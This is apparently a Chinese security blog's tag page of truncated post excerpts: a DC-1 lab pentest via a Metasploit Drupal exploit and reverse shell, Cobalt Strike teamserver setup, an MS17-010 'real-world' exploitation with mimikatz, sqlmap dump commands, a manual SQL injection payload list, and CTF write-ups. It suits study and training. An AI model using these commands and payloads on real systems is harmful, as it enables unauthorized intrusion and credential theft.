TypechoJoeTheme

Harvey

统计
登录
用户名
密码
/
注册
用户名
邮箱
搜索到 19 篇与 笔记 的结果
2021-03-03

DC-1靶机渗透测试报告

DC-1靶机渗透测试报告
立个flag:一天一个DC机(滑稽 下载地址:https://blog.harvey.plus/index.php/Mine/54.html准备工作DC-1(nat模式);kali(nat模式)信息搜集打开DC-1页面如下:(没给账号密码需要自己渗透进去首先我们对其进行内网扫描arp-scan -l这里我直接浏览器对其访问发现的Wappalyzer查看其服务信息发现cms是Drupal 7或者用nmap扫描nmap -sP 192.168.232.0/24接着扫波目录,发现都没啥卵用dirb http://192.168.232.141/漏洞攻击msf搜索目标cms版本漏洞,实现渗透msfconsole search Drupalemmm,这里我们就用最新的漏洞use 6 set rhost 192.168.232.141 show options run芜湖,exit后选择4(第二新的)成功getshell反弹式的shell,进入交互界面shell python -c 'import pty;pty.spawn("/bin/sh")' # 产生一个原生的终端...
Harvey
2021-03-03

Mine,笔记

23 阅读
0 评论
2021年03月03日
23 阅读
0 评论
2021-02-28

CTF-图片隐写那些事儿

CTF-图片隐写那些事儿
前言懒狗今天决定整理一下图片隐写上的一些工具[line]我可没辣么简单.png[/line]1.F5-steganography一款F5隐写工具(kali)(PS:需要密码)kali安装命令(也可直接下载):git clone https://github.com/matthewgao/F5-steganography加密:java Embed 原图.jpg 生成图.jpg -e 隐藏的文件.txt -p '密码'解密:java Extract 生成图.jpg -p '密码'[line]举个栗子吧~[/line]2.steghideSteghide是一种隐写程序,能够隐藏各种图像和音频文件中的数据。颜色方面的样本频率不会更改,因此使嵌入抗一阶统计检验。Windows下官网下载地址:http://steghide.sourceforge.net/download.php加密:steghide embed -cf .\原图.jpg -ef 隐藏的文件.txt 然后还要输入密码,确认密码解密:steghide extract -p '密码' -sf .\生成图.jpg 输入 y 确认[...
Harvey
2021-02-28

CTF,Mine,笔记

31 阅读
0 评论
2021年02月28日
31 阅读
0 评论
2021-02-12

再见2020,你好2021!

再见2020,你好2021!
前言:原本身为懒狗的我是不准备写这年度总结滴QAQbut 跨年夜外面就和打战一样一炮接一炮(吵死个人),最终爬起来简单写一下总结20202020年初由于疫情不用去学校使得我有大把时间浪,老赛棍的我参加了许多场比赛(签到选手~)也正是因此认识许多志群道和的师傅们,期间泻药0kami邀请加入了N1ce一起打比赛,感谢各位陪伴我一起走过了那段可能让我很无聊的时光!接着就到了一年两度的期末考了,感谢线上考试让我轻松及格以及电路分析补考顺利过关~nice!对了,考前参加的DozerCTF还拿了个优(安)秀(慰)奖接着就是一波安逸的暑假还有好多就不一一列出了~很快就通知开学了,得去学校了(有一说一我是真不想去学校QAQ)好日子就这样没了一到学校就各种奇奇怪怪的规矩(突然想阴阳怪气~不过渣渣二本也就这样了,认命吧大过年的还是整喜庆点⑧√开学后我就大二啦,喜提学长称号由于我们学校断层了,开学后我接手了网络安全协会的会长一职(本人其实并不是很想当接着就是一年一度的网络安全宣传周,各地省赛接踵而至,我们大福建当然也不列外,不过由于疫情,百越杯被冲掉,黑盾杯变成线上赛,不过工控进入决赛使得我有幸去了人...
Harvey
2021-02-12

Mine,笔记

53 阅读
0 评论
2021年02月12日
53 阅读
0 评论
2021-02-03

记一次CS的搭建过程

记一次CS的搭建过程
前言:为提升实战技术并积累实战经验,于是我在vultr服务器上第一次搭建了CS环境:Debian10Cobalt Strike 4.1首先,我们先要准备一台Debian10的服务器(其他也可)接着我们ssh连上服务器ssh root@IP 登录(回车yes输入密码 apt update 打开sftp将cs上传(put上传文件 get下载文件)sftp root@IP 进入ftp(回车输入密码 ls put C:\Users\xxx\cs4.1.zip 上传cs返回ssh解压cs(Ubuntu默认是没有安装unzip)apt install unzip 安装unzip unzip cs4.1.zip 解压cs安装javaapt install default-jdk启动cscd cs4.1 进入cs文件 sudo ./teamserver IP 密码 启动cs并设置密码 如果报错出现无此命令,使用“chmod 777 teamserver”授予权限即可。结束Ctrl c由...
Harvey
2021-02-03

Mine,笔记

38 阅读
0 评论
2021年02月03日
38 阅读
0 评论
2020-11-27

记一次MS17-010的实战利用过程

记一次MS17-010的实战利用过程
首先,我们是使用s扫描器扫一波端口并导出文本直接上msf(到位!nice!sudo msfconsol 进入msf search ms17 查找对应的ms17 use 9 进入ms17 set rhost IP 设置相应的IP show options 查看IP是否符合 run 运行 如果打成功的话就爆一下密码 load mimikatz kerberos 如果以上皆成功,就可以撞密码啦~先根据得到的账号密码将pass和user文本进行修改点击开始即可(万一运气好撞到了就可以连他的3389进行信息收集啦......
Harvey
2020-11-27

Mine,笔记

28 阅读
0 评论
2020年11月27日
28 阅读
0 评论
2020-10-28

学习资料

学习资料
相信我!真的都是学习资料哦~~大泽恵+朝河兰+黒沢爱+早阪ひとみ(早阪曈)+来生ひかり(来生光)+星崎未来+苍井そら(苍井空)+高树マリア(高树玛丽亚)+美竹凉子+松岛かえで(松岛枫)+南波杏+吉沢明歩+小泉彩+桜朱音+香山圣+白鸟さくら(白鸟樱)靶机资源合集DC靶机1-9链接:https://pan.baidu.com/s/1FKj5puh7FvsvxzfjAr8uDQ 提取码:qlm9下载解压,用vm,或者vbox打开设置网络配置器为与攻击机一个网段,即可开始渗透测试!哆啦实战靶场链接:https://pan.baidu.com/s/1vt-lGt86sNLJd77a0QD8gA 提取码:ktfs[line]搭建方法[/line]准备工具:phpstudy,哆啦靶场源码运行phpstudy,解压哆啦源码到网站的根目录下浏览器打开靶场先安装sqli的数据库,进去sql练习靶场,点击建立数据库会发现出现这样的错误页面这是因为没有连接上数据库打开连接数据库的配置文件,修改连接的账户信息在dbpass中填入本地mysql数据库root账号的密码,一般phpstudy数据库密码为roo...
Harvey
2020-10-28

Mine,Gamma实验室

23 阅读
0 评论
2020年10月28日
23 阅读
0 评论
2020-10-18

I春秋渗透训练总结

I春秋渗透训练总结
成绩单Burp抓包另存为sql.txt放置d盘打开SQLMap执行以下命令sqlmap.py -r d:\sql.txt -p id --current-db // -p 指定参数 -r 加载一个文件 --current 获取当前数据库名称 获得名称 skctf_flagsqlmap.py -r d:\sql.txt -p id -D skctf_flag --tables //-D 指点数据库名称 --tables 列出数据库中的表 得到数据库名称 fl4g和scsqlmap.py -r d:\sql.txt -p id -D skctf_flag -T fl4g --columns //-t 指定表名称 --columns 列出表中的字段 得到skctf_flagsqlmap.py -r d:\sql.txt -p id -D skctf_flag -T fl4g c skctf_flag --dump // --dump列出字段数据得到flag字符?正则?die函数输出一条消息后并且推出当前脚本。是exit函数的别名...
Harvey
2020-10-18

水文,笔记

24 阅读
0 评论
2020年10月18日
24 阅读
0 评论
2020-10-18

git基操

git基操
前言:由于发现之前一个附件被某盘吃掉了(还好有备份,于是就选择了上传到github上,在此记录一下,大佬勿喷~首先Create repository接着找到自己喜欢的磁盘位置,打开git base,输入git clone https://github.com/SMU-harvey/Harvey.git打开对应位置显示出git的文件夹即为成功,然后将想要上传的文件放进去即可最后输入以下三行命令即可:git add . git commit -m "提交的描述" git push这时你就可以成功访问此网站,下载你上传的文件
Harvey
2020-10-18

Mine,笔记

30 阅读
0 评论
2020年10月18日
30 阅读
0 评论
2020-10-18

信息搜集

信息搜集
1.域名信息:a,通过域名获取对应的IP,然后通过ping看一下这个IP这台服务器TTL返回的时间返回值 ​ 初步的判断这个用的是什么服务器什么版本,还可以输入ns lookup+域名来查看这个域名对应的IP地址b.收集子域名(1).site+域名(2).使用工具layer子域名挖掘机4.2(3).使用工具subDomainsBrute子域名较好找漏洞c.whois(注册人)信息查询:(1).根据已知域名反查,分析出此域名的注册人、邮箱、电话等(2).工具:爱站网、站长工具、微步在线(http://x.threatbook.cn)(3).site.ip138.com、searchdns.netcraft.com2.敏感目录:a.收集方向:robots.txt、后台目录、安装包、上传目录、MySQL管理接口、安装页面、 phpinfo、编辑器、IIS短文件b.常用工具:字典爆破>>御剑、dirbuster、wwwscan、iis_shortname_scanner蜘蛛爬行>>爬行菜刀、webrobot、burp 3.端口扫描:21>>ftp 22...
Harvey
2020-10-18

水文,Mine,笔记

30 阅读
0 评论
2020年10月18日
30 阅读
0 评论
2020-10-18

RSA

RSA
RSA解密过程这种题目一般会给你一个.enc文件(被加密过的flag文件)还有一个.pem文件(公钥文件)|在Kali系统的terminal中使用OpenSSL执行openssl rsa -pubin -in pubkey.pem -text -modulus,即可看到该pem文件内的公钥e和模数n,接着在质数分解网站分解这个模数得到p和q两个质数,之后可以使用exe版的RSAtool得出私钥d。如果是要求我们解密enc文件的话,我们需要使用python版的rsatools获得私钥的pem文件,执行以下命令:python3 rsatool.py -f PEM -o private.pem -p Value_p -q Value_q -e Value_e我们就获得了一个private.pem的私钥文件,之后再执行以下命令:openssl rsautl -decrypt -in flag.enc -inkey private.pem -out flag.dec我们就能得到一个flag.dec文件,里面就是解密得到的字符了。RSA中的攻击方式1.共模攻击2.低指数/高指数攻击3.中国余...
Harvey
2020-10-18

CTF,水文,笔记

26 阅读
0 评论
2020年10月18日
26 阅读
0 评论
2020-10-18

SQL手工注入

SQL手工注入
看看下面的1.判断是否有注入;and 1=1;and 1=22.初步判断是否是mssql;and user>03.判断数据库系统;and (select count(*) from sysobjects)>0 mssql;and (select count(*) from msysobjects)>0 access4.注入参数是字符'and [查询条件] and ''='5.搜索时没过滤参数的'and [查询条件] and '%25'='6.猜数据库;and (select Count(*) from [数据库名])>07.猜字段;and (select Count(字段名) from 数据库名)>08.猜字段中记录长度;and (select top 1 len(字段名) from 数据库名)>09.(1)猜字段的ascii值(access);and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0(2)猜字段的ascii值(mssql);and (select top 1 unicode(sub...
Harvey
2020-10-18

水文,笔记

26 阅读
0 评论
2020年10月18日
26 阅读
0 评论
2020-10-18

CTF-反序列化

CTF-反序列化
Web_php_unserialize原文传送门打开题目所在的网页:(做ctf题时最喜欢有源码了)简单分析一下首先一个Demo类,类里面定义了私有属性file值,然后构造函数把值赋值给当前的对象的,然后析构函数会执行highlight_file这个函数,这个函数就是打印输出指定文件的代码,然后还有个__wakeup方法,会被当前对象file属性重新赋值成index.html然后就是GET接受传递进来的Var参数值,再base编码,然后再正则匹配。这里匹配 O:数字 C:数字这类都给你打印STOPhacking,然后没有匹配到就会反序列化逻辑大概就这样的:很简单!说一下在这个类中反序列化中方法执行的顺序吧,首先构造函数=》__wakeup函数=>析构函数其实反序列化其实别没有那么难,你得了解原理,然后构造exp生成poc才会理所当然!先看看我的exp吧 <?php class Demo { private $file = 'fl4g.php'; } $ctf = new Demo(); $b = serialize(...
Harvey
2020-10-18

CTF,Writeup,笔记

26 阅读
0 评论
2020年10月18日
26 阅读
0 评论
Harvey
最怕碌碌无为还叹平凡可贵
101 文章数
11 评论量

人生倒计时

今日已经过去小时
这周已经过去
本月已经过去
今年已经过去个月

标签云

微博热搜榜

  • 获取失败!

今日天气